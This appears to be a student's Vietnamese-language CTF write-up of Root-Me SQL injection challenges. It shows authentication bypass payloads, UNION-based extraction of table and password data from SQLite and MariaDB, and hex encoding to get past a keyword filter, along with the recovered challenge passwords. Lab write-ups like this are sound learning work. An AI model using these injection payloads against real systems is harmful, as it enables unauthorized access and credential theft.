# Hi bro, tắt quyền chỉnh sửa đi nhé=))) # ROOT ME ## SQL injection - Authentication ![Ảnh chụp màn hình 2024-06-15 184819](https://hackmd.io/_uploads/Bk65V-sS0.png) tại chall này yêu cầu lấy được password của ad nên em sẽ sử dụng burpsuite xem thử code web này ![image](https://hackmd.io/_uploads/SJXoBbsr0.png) em nhận được báo lỗi ![image](https://hackmd.io/_uploads/r1YnB-sB0.png) xem trả về của code ![image](https://hackmd.io/_uploads/Bktl8-jHC.png) ở đây nhận giá trị input trực tiếp vào SQL, không có bước xử lý đầu vào nên đây có thể tấn công SQLi em sẽ thử bằng cách thêm ``` ' OR 1=1-- - ``` nó đóng vai trò như comment và 1=1 luôn đúng ![image](https://hackmd.io/_uploads/HyhcKWjS0.png) ở đây đã đăng nhập được, xem response trả về có passwword là```TYsgv75zgtq``` em sẽ submit kết quả này ![image](https://hackmd.io/_uploads/HkWSJKwB0.png) chall này em ghi nhiều chứ thật ra ```' or 1=1-- -``` r ctrl-U là có pass r ## SQL injection - Authentification - GBK chall này em bí =(( đọc wu cũng chưa thẩm được nên em chưa giải wu lại ## SQL injection - string ![image](https://hackmd.io/_uploads/BktWTsfuC.png) ![image](https://hackmd.io/_uploads/BJrm6oGOR.png) ![image](https://hackmd.io/_uploads/H172ToGO0.png) ![image](https://hackmd.io/_uploads/HJs66sfuA.png) ![image](https://hackmd.io/_uploads/r1f-AifdC.png) ![image](https://hackmd.io/_uploads/B1iZJ2fuA.png) tại respond em thấy xuất hiện lỗi SQLite3 em sẽ search avf tìm hiểu cách khai thác bảng trong SQLite3 em tìm đc cấu truy vấn ```from sqlite_master``` em thử với bài, kết hợp với 2 cột khai thác đc ở trên ![image](https://hackmd.io/_uploads/S1sa_hzOC.png) tại chall này cần lấy password của ad nên em sẽ khai thác từ cột user ![image](https://hackmd.io/_uploads/rJVg9nMOR.png) không được, thử lại ![image](https://hackmd.io/_uploads/Sk8692zOA.png) có tài khoản admin, vậy em lấy pass pass: c4K04dtIaJsuWdi ![image](https://hackmd.io/_uploads/HJwzshQuA.png) ## SQL Injection - Routed ![image](https://hackmd.io/_uploads/rk4kDkYvA.png) ![image](https://hackmd.io/_uploads/HyzzDkFwA.png) thử attack login nhưng không khả thi mấy ![image](https://hackmd.io/_uploads/SyfUDkFwA.png) thử sang search ![image](https://hackmd.io/_uploads/B1zdP1KD0.png) ![image](https://hackmd.io/_uploads/S1psDyYPR.png) đều bị phát hiện tấn công ![image](https://hackmd.io/_uploads/Byf6DJYPR.png) nhưng mà ```union select``` có vẻ khai thác được gì đó ![image](https://hackmd.io/_uploads/SJ_Ud1YvR.png) ![image](https://hackmd.io/_uploads/B1um_kYvR.png) **MariaDB là gì :vvv ???** MariaDB là hệ quản trị CSDL được phát triển từ hệ quản trị CSDL mã nguồn mở MySQL. MariaDB là sự kết hợp của cả 2 loại cơ sở dữ liệu là SQL và NoSQL Khúc này r em cũng không biết sao nữa, nên em có đọc wu trên mạng em đọc wu thì biết chall này lồng query 2 vào query 1 và có decode mã hex để giải chall này tại chall này nó bắt lỗi các attack từ khóa nên nó sẽ phát hiện attacked liền nên sẽ thực hiện chuyển câu truy vấn trên sang mã hex ![image](https://hackmd.io/_uploads/SkRaX67OC.png) và lồng query 2 vào query 1 ```' union select 1' order by 3-- - ``` => ```' union select 0x27206F726465722062792033202D2D202D-- -``` ![image](https://hackmd.io/_uploads/ByRNrTXdR.png) ở đây có thông báo không vượt quá 3 cột, có thể đoán 2 cột 1 cột là user 1 cột password khai thác tên bảng ```'uninon select 'union select 1, table_name from information_schema.tables where table_schema = database() -- - -- -``` => ```'union select 202720756E696F6E2073656C65637420312C207461626C655F6E616D652066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D61203D2064617461626173652829202D2D202D202D2D202D-- -' ![image](https://hackmd.io/_uploads/HJX_u6Q_R.png) ```' union select ' union SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'users'-- - -- -``` =>```' union select 0x2720756E696F6E2053454C45435420312C67726F75705F636F6E63617428636F6C756D6E5F6E616D65292046524F4D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73205748455245207461626C655F6E616D65203D20277573657273272D2D202D202D2D202D-- -``` ![image](https://hackmd.io/_uploads/HkjG6p7dR.png) tiếp tục lấy thông tin ```' union select ' union select 1,concat(login,password) from users -- - -- -``` => ```' union select 0x2720756E696F6E2073656C65637420312C636F6E636174286C6F67696E2C70617373776F7264292066726F6D207573657273202D2D202D202D2D202D-- -``` ![image](https://hackmd.io/_uploads/S1LP0aQdC.png) pass: qs89QdAs9A ## SQL injection Digital ![image](https://hackmd.io/_uploads/H1a3bP4PA.png) start the chall ![image](https://hackmd.io/_uploads/Sk51zvEvA.png) ở đây có 3 mục và có phần login thử login "ad' OR 1=1-- -" ![image](https://hackmd.io/_uploads/BkFLGvEv0.png) ko có kết quả gì thử quay lại 3 mục ban đầu, thấy có "id=1" ![image](https://hackmd.io/_uploads/HJJfQP4PA.png) thử thêm ' vào sau id=1 , thì xuất hiện lỗi ![image](https://hackmd.io/_uploads/Hyv9m07_0.png) ở đây hiện lỗi SQLite3 thử chèn thêm vào URL thử đc gì không ở đây em sẽ dùng order by thử ![image](https://hackmd.io/_uploads/BkXNXAmdA.png) ``` union select 1,2,3-- -``` chall này giống bài tk Khôi cho làm ![image](https://hackmd.io/_uploads/H1fVERXOC.png) ở đây thử khai thác thông tin ở cột 2 và cột 3 thử cột 2 trước ```1,sql,3 FROM sqlite_master--``` ![image](https://hackmd.io/_uploads/SJEZUz4OC.png) tới đây trích xuất thông tin của users để lấy username và password ![image](https://hackmd.io/_uploads/Hkc9UGN_C.png) pass: aTlkJYLjcbLmue3 ## SQL injection - Error ![image](https://hackmd.io/_uploads/HJLTOME_R.png) thử thực hiện câu lệnh attack cơ bản nhưng đều ko login đc em thử thêm ' vào sau URL xem trang báo lỗi ko? ![image](https://hackmd.io/_uploads/B1qWtG4uC.png) thfi trang đã xảy ra lỗi tại chall này vào content thì nó yêu cầu phải login nhưng khi em thử thêm ' vào sau URL luôn thì nó báo lỗi ![image](https://hackmd.io/_uploads/rk8TKfVdR.png) có lẽ đây là lỗi có thể khai thác đc từ trong bài em thử thay đổi các tham số đầu vào của order mà em bí r